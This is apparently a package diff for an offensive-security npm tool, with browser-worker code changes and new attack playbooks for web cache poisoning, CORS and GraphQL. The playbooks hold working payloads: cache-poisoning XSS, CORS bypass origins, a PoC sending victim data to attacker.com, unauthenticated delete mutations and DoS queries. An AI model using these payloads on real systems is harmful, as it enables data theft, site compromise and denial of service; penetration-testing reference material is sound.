@cyberstrike-io/cyberstrike 1.1.13 → 1.1.14

package/hackbrowser-worker.js

@@ -31028,8 +31028,8 @@ async function waitForManualLogin(page, label) {
       btn.style.cssText = [
         "all: initial",
         "position: fixed",
-        "bottom: 16px",
-        "left: 16px",
+        "top: 16px",
+        "right: 16px",
         "z-index: 2147483647",
         "display: flex",
         "flex-direction: column",
@@ -40637,6 +40637,18 @@ Always respond with a valid JSON object. If there is nothing to explore, return:
 
 // ../hackbrowser/src/navigator.ts
 var log3 = Log.create({ service: "hackbrowser:navigator" });
+function isAuthError(err) {
+  if (!err || typeof err !== "object")
+    return false;
+  const e = err;
+  if (e.name === "AI_LoadAPIKeyError")
+    return true;
+  if (e.statusCode === 401 || e.statusCode === 403)
+    return true;
+  if (e.lastError && isAuthError(e.lastError))
+    return true;
+  return Array.isArray(e.errors) && e.errors.some(isAuthError);
+}
 function loadPlannerPrompt() {
   return planner_default;
 }
@@ -40693,10 +40705,14 @@ async function planPage(snapshot, model, usageAcc) {
     log3.debug("page plan", { tasks: plan.tasks.length });
     return plan;
   } catch (err) {
+    if (isAuthError(err))
+      throw err;
     log3.warn("planPage failed, retrying once", { err: String(err) });
     try {
       return await attempt();
     } catch (err2) {
+      if (isAuthError(err2))
+        throw err2;
       log3.error("planPage failed after retry, returning empty plan", { err: String(err2) });
       return { tasks: [] };
     }
@@ -40743,6 +40759,8 @@ async function planUnexploredElements(snapshot, unexploredLabels, model, usageAc
     log3.debug("unexplored plan", { tasks: plan.tasks.length });
     return plan;
   } catch (err) {
+    if (isAuthError(err))
+      throw err;
     log3.warn("planUnexploredElements failed", { err: String(err) });
     return { tasks: [] };
   }
@@ -53975,8 +53993,7 @@ function validate(opts) {
   if (!opts.url) {
     throw new Error("opts.url is required");
   }
-  const headlessRequested = opts.headless !== false;
-  if (opts.multiCredentials && opts.multiCredentials.length >= 2 && headlessRequested) {
+  if (opts.multiCredentials && opts.multiCredentials.length >= 2 && opts.headless === true) {
     throw new Error("multi-credential mode requires headless: false (manual login is currently the only supported flow)");
   }
 }
@@ -54056,33 +54073,107 @@ function send(msg) {
   process.stdout.write(JSON.stringify(msg) + `
 `);
 }
+function stripSamplingParams(body) {
+  if (typeof body !== "string")
+    return body;
+  try {
+    const json2 = JSON.parse(body);
+    if (json2 && typeof json2 === "object") {
+      delete json2["temperature"];
+      delete json2["top_p"];
+      delete json2["top_k"];
+      return JSON.stringify(json2);
+    }
+  } catch {}
+  return body;
+}
+function applyAnthropicBearerBody(body, opts) {
+  if (typeof body !== "string")
+    return body;
+  try {
+    const j = JSON.parse(body);
+    if (opts.stripSampling) {
+      delete j["temperature"];
+      delete j["top_p"];
+      delete j["top_k"];
+    }
+    if (opts.userId)
+      j["metadata"] = { ...j["metadata"] ?? {}, user_id: opts.userId };
+    if (opts.systemPrefix) {
+      const prefix = { type: "text", text: opts.systemPrefix };
+      if (Array.isArray(j["system"]))
+        j["system"] = [prefix, ...j["system"]];
+      else if (typeof j["system"] === "string")
+        j["system"] = [prefix, { type: "text", text: j["system"] }];
+      else if (j["system"] == null)
+        j["system"] = [prefix];
+    }
+    return JSON.stringify(j);
+  } catch {
+    return body;
+  }
+}
 function createModelFromDescriptor(desc) {
+  const stripSampling = desc.supportsTemperature === false;
+  const samplingFetch = stripSampling ? (input, init) => fetch(input, init ? { ...init, body: stripSamplingParams(init.body) } : init) : undefined;
   if (desc.npm.includes("anthropic")) {
-    const opts = {};
+    if (desc.authToken) {
+      const token = desc.authToken;
+      const beta = desc.anthropicBeta;
+      const opts3 = {
+        apiKey: "placeholder",
+        fetch: (url2, init) => {
+          const headers = new Headers(init?.headers);
+          headers.delete("x-api-key");
+          headers.set("authorization", `Bearer ${token}`);
+          if (beta)
+            headers.set("anthropic-beta", beta);
+          const body = applyAnthropicBearerBody(init?.body, {
+            stripSampling,
+            userId: desc.anthropicUserId,
+            systemPrefix: desc.anthropicSystemPrefix
+          });
+          return fetch(url2, { ...init, headers, body });
+        }
+      };
+      if (desc.baseURL)
+        opts3.baseURL = desc.baseURL;
+      if (desc.headers)
+        opts3.headers = desc.headers;
+      return createAnthropic(opts3)(desc.modelApiId);
+    }
+    const opts2 = {};
     if (desc.apiKey)
-      opts.apiKey = desc.apiKey;
+      opts2.apiKey = desc.apiKey;
     if (desc.baseURL)
-      opts.baseURL = desc.baseURL;
+      opts2.baseURL = desc.baseURL;
     if (desc.headers)
-      opts.headers = desc.headers;
-    return createAnthropic(opts)(desc.modelApiId);
+      opts2.headers = desc.headers;
+    if (samplingFetch)
+      opts2.fetch = samplingFetch;
+    return createAnthropic(opts2)(desc.modelApiId);
   }
   if (desc.npm === "@ai-sdk/openai") {
-    const opts = {};
+    const opts2 = {};
     if (desc.apiKey)
-      opts.apiKey = desc.apiKey;
+      opts2.apiKey = desc.apiKey;
     if (desc.baseURL)
-      opts.baseURL = desc.baseURL;
+      opts2.baseURL = desc.baseURL;
     if (desc.headers)
-      opts.headers = desc.headers;
-    return createOpenAI(opts)(desc.modelApiId);
+      opts2.headers = desc.headers;
+    if (samplingFetch)
+      opts2.fetch = samplingFetch;
+    return createOpenAI(opts2)(desc.modelApiId);
   }
-  return createOpenAICompatible({
+  const opts = {
     name: "hackbrowser-provider",
     apiKey: desc.apiKey ?? "",
     baseURL: desc.baseURL ?? "https://api.openai.com/v1",
     headers: desc.headers
-  }).languageModel(desc.modelApiId);
+  };
+  if (samplingFetch)
+    opts.fetch = samplingFetch;
+  return createOpenAICompatible(opts).languageModel(desc.modelApiId);
 }
 function buildCrawlOptions(opts, signal) {
   const logSink = (rec) => {

package/package.json

@@ -7,7 +7,7 @@
   "scripts": {
     "postinstall": "bun ./postinstall.mjs || node ./postinstall.mjs"
   },
-  "version": "1.1.13",
+  "version": "1.1.14",
   "license": "AGPL-3.0-only",
   "keywords": [
     "cyberstrike",
@@ -40,16 +40,16 @@
     "playwright": "1.58.2"
   },
   "optionalDependencies": {
-    "@cyberstrike-io/cyberstrike-darwin-x64": "1.1.13",
-    "@cyberstrike-io/cyberstrike-linux-x64-baseline": "1.1.13",
-    "@cyberstrike-io/cyberstrike-linux-arm64": "1.1.13",
-    "@cyberstrike-io/cyberstrike-windows-x64-baseline": "1.1.13",
-    "@cyberstrike-io/cyberstrike-darwin-x64-baseline": "1.1.13",
-    "@cyberstrike-io/cyberstrike-linux-arm64-musl": "1.1.13",
-    "@cyberstrike-io/cyberstrike-linux-x64": "1.1.13",
-    "@cyberstrike-io/cyberstrike-windows-x64": "1.1.13",
-    "@cyberstrike-io/cyberstrike-linux-x64-baseline-musl": "1.1.13",
-    "@cyberstrike-io/cyberstrike-linux-x64-musl": "1.1.13",
-    "@cyberstrike-io/cyberstrike-darwin-arm64": "1.1.13"
+    "@cyberstrike-io/cyberstrike-darwin-x64": "1.1.14",
+    "@cyberstrike-io/cyberstrike-windows-x64": "1.1.14",
+    "@cyberstrike-io/cyberstrike-darwin-x64-baseline": "1.1.14",
+    "@cyberstrike-io/cyberstrike-windows-x64-baseline": "1.1.14",
+    "@cyberstrike-io/cyberstrike-linux-x64-musl": "1.1.14",
+    "@cyberstrike-io/cyberstrike-linux-arm64-musl": "1.1.14",
+    "@cyberstrike-io/cyberstrike-linux-arm64": "1.1.14",
+    "@cyberstrike-io/cyberstrike-darwin-arm64": "1.1.14",
+    "@cyberstrike-io/cyberstrike-linux-x64-baseline-musl": "1.1.14",
+    "@cyberstrike-io/cyberstrike-linux-x64-baseline": "1.1.14",
+    "@cyberstrike-io/cyberstrike-linux-x64": "1.1.14"
   }
 }

package/postinstall.mjs

@@ -164,6 +164,12 @@ function installSkills() {
  * The actual chromium binary requires a separate one-time step:
  *   npx playwright install chromium
  */
+// Pinned playwright version for the hackbrowser worker. MUST stay in sync with
+// packages/hackbrowser/package.json (and packages/cyberstrike/package.json). The
+// playwright version is coupled to a specific Chromium build, so a drift here
+// causes "Chromium <rev> is not installed" at runtime.
+const PLAYWRIGHT_VERSION = "1.58.2"
+
 function installHackbrowserWorker() {
   const workerSrc = path.join(__dirname, "hackbrowser-worker.js")
   if (!fs.existsSync(workerSrc)) {
@@ -187,16 +193,23 @@ function installHackbrowserWorker() {
   if (!fs.existsSync(playwrightDir)) {
     console.log("Installing playwright npm package for hackbrowser worker...")
     try {
-      execSync(`npm install --prefix "${dataDir}" playwright@1.58.2 --no-fund --no-audit --loglevel=error`, {
-        stdio: "inherit",
-        timeout: 120000,
-      })
+      // --save-exact pins the dependency without a caret ("1.58.2", not
+      // "^1.58.2"). A caret range lets a later `npm install` in this dir bump
+      // to a newer minor (e.g. 1.59.x) whose Chromium build won't match the one
+      // installed via `npx playwright install chromium`, breaking the worker.
+      execSync(
+        `npm install --prefix "${dataDir}" --save-exact playwright@${PLAYWRIGHT_VERSION} --no-fund --no-audit --loglevel=error`,
+        {
+          stdio: "inherit",
+          timeout: 120000,
+        },
+      )
       console.log("playwright installed to", nodeModulesDir)
     } catch (err) {
       console.warn(
         "Warning: Failed to install playwright automatically:",
         err.message,
-        "\nTo install manually: npm install --prefix ~/.local/share/cyberstrike playwright@1.58.2",
+        `\nTo install manually: npm install --prefix ~/.local/share/cyberstrike --save-exact playwright@${PLAYWRIGHT_VERSION}`,
       )
     }
   } else {

package/skill/attack-cache-poison/SKILL.md

@@ -0,0 +1,124 @@
+---
+name: attack-cache-poison
+description: "Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - cache-poisoning
+  - web
+  - xss
+  - attack
+tech_stack:
+  - web
+cwe_ids:
+  - CWE-444
+  - CWE-525
+chains_with:
+  - attack-host-header
+  - attack-open-redirect
+prerequisites: []
+severity_boost:
+  attack-host-header: "Host header + cache = stored XSS/redirect affecting all users"
+---
+
+# Web Cache Poisoning
+
+## Objective
+
+Inject malicious content into cached responses via unkeyed inputs (headers, parameters) so that subsequent users receive the poisoned response.
+
+## Testing Methodology
+
+### Phase 1: Identify Cache Behavior
+
+```bash
+# Check cache headers
+curl -s -D- https://TARGET/ | grep -i "x-cache\|age\|cache-control\|cf-cache\|x-varnish"
+
+# Identify cache key components (vary header)
+curl -s -D- https://TARGET/ | grep -i "vary"
+```
+
+### Phase 2: Find Unkeyed Inputs
+
+Test headers that are reflected in response but NOT part of cache key:
+
+```bash
+# X-Forwarded-Host
+curl -s https://TARGET/ -H "X-Forwarded-Host: evil.com" | grep "evil.com"
+
+# X-Forwarded-Scheme
+curl -s https://TARGET/ -H "X-Forwarded-Scheme: nothttps" | grep "redirect"
+
+# X-Original-URL / X-Rewrite-URL
+curl -s https://TARGET/ -H "X-Original-URL: /admin"
+
+# Custom headers
+curl -s https://TARGET/ -H "X-Forwarded-Port: 1234"
+```
+
+### Phase 3: Cache Poisoning via Unkeyed Header
+
+```bash
+# Poison with XSS payload
+curl -s https://TARGET/ \
+  -H "X-Forwarded-Host: evil.com\"><script>alert(1)</script>"
+
+# Wait for cache to store, then verify
+curl -s https://TARGET/ | grep "alert(1)"
+```
+
+### Phase 4: Unkeyed Parameter Poisoning
+
+```bash
+# Find parameters not in cache key
+curl -s "https://TARGET/?cb=123" -D- | grep "x-cache"
+curl -s "https://TARGET/?utm_source=evil" | grep "evil"
+
+# Reflected unkeyed parameter → stored XSS
+curl -s "https://TARGET/?evil=<script>alert(1)</script>"
+```
+
+### Phase 5: Fat GET / POST-based Poisoning
+
+```bash
+# Fat GET — body in GET request
+curl -s https://TARGET/ -X GET -d "param=<script>alert(1)</script>"
+
+# POST → GET cache confusion
+curl -s https://TARGET/ -X POST \
+  -H "X-HTTP-Method-Override: GET" \
+  -d "param=evil"
+```
+
+### Phase 6: Cache Key Normalization
+
+```bash
+# Path normalization differences
+curl -s "https://TARGET/path/../admin"
+curl -s "https://TARGET/PATH" vs "https://TARGET/path"
+curl -s "https://TARGET/path;.js"
+```
+
+## What Constitutes a Finding
+
+| Finding | Severity |
+|---------|----------|
+| Cached XSS payload served to other users | Critical (P1) |
+| Cached redirect to attacker domain | High (P2) |
+| Denial of service via cache poisoning (error page cached) | Medium (P3) |
+| Unkeyed header reflected (no cache impact proven) | Low (P4) |
+
+## Evidence Requirements
+
+- Unkeyed input identified (header or parameter)
+- Response showing injected content
+- Cache headers proving response was cached (X-Cache: HIT, Age > 0)
+- Second request (clean) still receiving poisoned content
+- Impact: XSS, redirect, or DoS
+
+## References
+
+- [PortSwigger: Web Cache Poisoning](https://portswigger.net/web-security/web-cache-poisoning)
+- [James Kettle: Practical Web Cache Poisoning](https://portswigger.net/research/practical-web-cache-poisoning)

package/skill/attack-cors/SKILL.md

@@ -0,0 +1,116 @@
+---
+name: attack-cors
+description: "CORS misconfiguration testing — origin reflection, wildcard bypass, null origin, credential leakage"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - cors
+  - web
+  - owasp
+  - access-control
+  - attack
+tech_stack:
+  - web
+cwe_ids:
+  - CWE-942
+  - CWE-346
+chains_with:
+  - attack-open-redirect
+  - attack-idor-automation
+prerequisites: []
+severity_boost:
+  attack-open-redirect: "CORS + open redirect = token theft via cross-origin request"
+---
+
+# CORS Misconfiguration Attack
+
+## Objective
+
+Identify Cross-Origin Resource Sharing misconfigurations that allow unauthorized cross-origin access to sensitive data or APIs.
+
+## Testing Methodology
+
+### Phase 1: Origin Reflection Detection
+
+Test if the server reflects arbitrary origins in `Access-Control-Allow-Origin`:
+
+```bash
+# Automated CORS checker (bundled script)
+attack_script cors_checker https://TARGET/api/endpoint --json-output
+```
+
+Manual tests:
+
+```bash
+# Arbitrary origin
+curl -s -H "Origin: https://evil.com" TARGET_URL -D- | grep -i "access-control"
+
+# Subdomain bypass
+curl -s -H "Origin: https://TARGET.evil.com" TARGET_URL -D-
+
+# Null origin
+curl -s -H "Origin: null" TARGET_URL -D-
+
+# HTTP downgrade
+curl -s -H "Origin: http://TARGET" TARGET_URL -D-
+```
+
+### Phase 2: Bypass Techniques
+
+```bash
+# Backtick bypass
+curl -s -H "Origin: https://TARGET%60.evil.com" TARGET_URL -D-
+
+# Underscore bypass
+curl -s -H "Origin: https://TARGET_.evil.com" TARGET_URL -D-
+
+# CRLF injection
+curl -s -H "Origin: https://evil.com%0d%0a" TARGET_URL -D-
+
+# Prefix matching bypass
+curl -s -H "Origin: https://evil-TARGET" TARGET_URL -D-
+```
+
+### Phase 3: Impact Verification
+
+If ACAO reflects attacker origin + ACAC is true:
+
+```html
+<!-- PoC: reads victim data cross-origin -->
+<script>
+fetch('https://TARGET/api/user/profile', {
+  credentials: 'include'
+})
+.then(r => r.json())
+.then(d => fetch('https://attacker.com/log?data=' + btoa(JSON.stringify(d))))
+</script>
+```
+
+## What Constitutes a Finding
+
+| Condition | Severity |
+|-----------|----------|
+| Arbitrary origin reflected + credentials allowed | Critical (P1) |
+| Arbitrary origin reflected, no credentials | Medium (P3) |
+| null origin accepted + credentials allowed | High (P2) |
+| Subdomain origin reflected + credentials | High (P2) |
+| Wildcard ACAO with credentials | Medium (P3) |
+
+## Evidence Requirements
+
+- Request with attacker `Origin` header
+- Response showing `Access-Control-Allow-Origin` reflection
+- Response showing `Access-Control-Allow-Credentials: true`
+- PoC HTML demonstrating cross-origin data access
+
+## Tools
+
+- `attack_script cors_checker` — automated multi-origin testing
+- `curl` — manual header injection
+- Browser DevTools — verify CORS behavior
+
+## References
+
+- [PortSwigger: CORS](https://portswigger.net/web-security/cors)
+- [OWASP: CORS Misconfiguration](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing)

package/skill/attack-graphql/SKILL.md

@@ -0,0 +1,121 @@
+---
+name: attack-graphql
+description: "GraphQL vulnerability testing — introspection exposure, complexity DoS, batch abuse, mutation auth bypass"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - graphql
+  - api
+  - web
+  - dos
+  - attack
+tech_stack:
+  - web
+  - graphql
+cwe_ids:
+  - CWE-200
+  - CWE-284
+  - CWE-770
+chains_with:
+  - attack-idor-automation
+prerequisites: []
+severity_boost:
+  attack-idor-automation: "GraphQL introspection reveals IDOR-vulnerable queries"
+---
+
+# GraphQL Vulnerability Testing
+
+## Objective
+
+Exploit GraphQL-specific vulnerabilities including schema exposure, query complexity abuse, and authorization bypass.
+
+## Testing Methodology
+
+### Phase 1: Automated Testing
+
+```bash
+# Full GraphQL test suite
+attack_script graphql_tester "https://TARGET/graphql" \
+  -H "Authorization:Bearer TOKEN" \
+  --json-output
+
+# Custom depth/batch
+attack_script graphql_tester "https://TARGET/graphql" \
+  --depth 15 --batch-count 100
+```
+
+### Phase 2: Introspection Query
+
+```bash
+# Full schema extraction
+curl -s -X POST https://TARGET/graphql \
+  -H "Content-Type: application/json" \
+  -d '{"query":"{ __schema { types { name fields { name type { name } } } mutationType { fields { name args { name type { name } } } } queryType { fields { name } } } }"}'
+```
+
+If introspection is enabled, map all types, queries, mutations, and subscriptions.
+
+### Phase 3: Authorization Bypass
+
+```graphql
+# Access admin queries without auth
+{ adminUsers { id email role } }
+
+# Mutation without auth
+mutation { deleteUser(id: "123") { success } }
+
+# Access other user's data
+{ user(id: "OTHER_USER_ID") { email ssn creditCard } }
+```
+
+### Phase 4: Complexity / DoS
+
+```graphql
+# Deeply nested query
+{ users { posts { comments { author { posts { comments { author { id } } } } } } } }
+
+# Alias multiplication
+{ a1: __typename a2: __typename ... a100: __typename }
+
+# Batch queries (array)
+[{"query":"{ __typename }"}, {"query":"{ __typename }"}, ... x50]
+```
+
+### Phase 5: Directive Abuse
+
+```graphql
+# Skip/include directive for info leakage
+{ user(id: "1") { name email @skip(if: false) secretField @include(if: true) } }
+
+# Field suggestions (error-based enum)
+{ user { nonExistentField } }
+# Error may suggest: "Did you mean: password, secret_key?"
+```
+
+## What Constitutes a Finding
+
+| Finding | Severity |
+|---------|----------|
+| Introspection enabled (schema exposed) | Medium (P3) |
+| Admin mutations accessible without auth | Critical (P1) |
+| Other user data accessible (IDOR) | High (P2) |
+| DoS via complexity (server timeout/crash) | Medium (P3) |
+| Batch queries bypass rate limiting | Medium (P3) |
+
+## Evidence Requirements
+
+- GraphQL endpoint URL
+- Query/mutation sent
+- Response showing unauthorized data
+- For introspection: schema dump (types, mutations, queries)
+- For DoS: response timing proving server overload
+
+## Tools
+
+- `attack_script graphql_tester` — automated introspection + DoS + batch testing
+
+## References
+
+- [PortSwigger: GraphQL](https://portswigger.net/web-security/graphql)
+- [HackerOne: GraphQL Bugs](https://www.hackerone.com/vulnerability-management/graphql-security-guide)